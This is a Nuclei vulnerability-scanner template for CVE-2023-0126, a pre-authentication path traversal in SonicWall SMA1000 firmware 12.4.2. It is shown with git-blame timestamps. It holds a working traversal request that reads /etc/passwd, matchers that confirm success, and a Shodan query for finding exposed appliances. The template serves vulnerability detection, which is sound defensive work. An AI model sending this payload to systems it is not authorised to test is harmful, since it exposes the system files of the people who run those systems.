nuclei-templates/http/cves/2023/CVE-2023-0126.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

2023-06-27 20:15:29 +00:00
id: CVE-2023-0126
info:
name: SonicWall SMA1000 LFI
author: tess
severity: high
description: |
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-0126
- https://github.com/advisories/GHSA-mr28-27qx-phg3
2023-07-11 19:49:27 +00:00
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001
2023-06-27 20:15:29 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0126
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.03359
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.90145
2023-06-27 20:15:29 +00:00
metadata:
max-request: 1
2023-06-27 20:15:29 +00:00
shodan-query: title:"Appliance Management Console Login"
verified: "true"
2023-07-11 19:49:27 +00:00
vendor: sonicwall
product: sma1000_firmware
2023-06-27 20:15:29 +00:00
tags: cve,cve2023,sonicwall,lfi,sma1000
http:
- method: GET
path:
- '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: word
part: header
words:
- content/unknown
2023-07-11 19:49:27 +00:00
- type: regex
regex:
- "root:[x*]:0:0"
2023-06-27 20:15:29 +00:00
- type: status
status:
- 200